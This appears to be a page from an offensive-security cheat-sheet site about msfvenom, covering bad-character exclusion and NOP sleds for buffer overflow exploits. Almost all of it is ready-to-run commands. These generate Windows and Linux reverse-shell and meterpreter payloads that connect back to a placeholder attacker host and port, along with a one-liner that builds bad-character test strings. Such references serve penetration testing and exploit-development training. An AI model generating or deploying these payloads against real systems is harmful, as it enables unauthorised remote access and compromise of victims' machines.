🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸ’£ msfvenom / Bad Characters & NOP Sleds

Bad Characters & NOP Sleds

Bad Characters

Used in buffer overflow exploits to exclude characters that break shellcode delivery (null bytes, newlines, etc.).

# Exclude \x00 \x0a \x0d
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> \
  -b '\x00\x0a\x0d' -f c

# Common bad chars for HTTP-based exploits
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -b '\x00\x0a\x0d\x20\x26\x2b\x3d' -f c

Generating Bad Char Test Strings

# Generate all bytes \x01-\xff as C array for comparison
python3 -c "print(''.join(f'\\\\x{i:02x}' for i in range(1,256)))"

NOP Sleds

Prepend N bytes of NOPs (\x90) before payload to absorb instruction pointer variance.

# 16-byte NOP sled
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> \
  -n 16 -f elf > nop_sled.elf

# 32-byte NOP sled on Windows shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> \
  -n 32 -b '\x00' -f c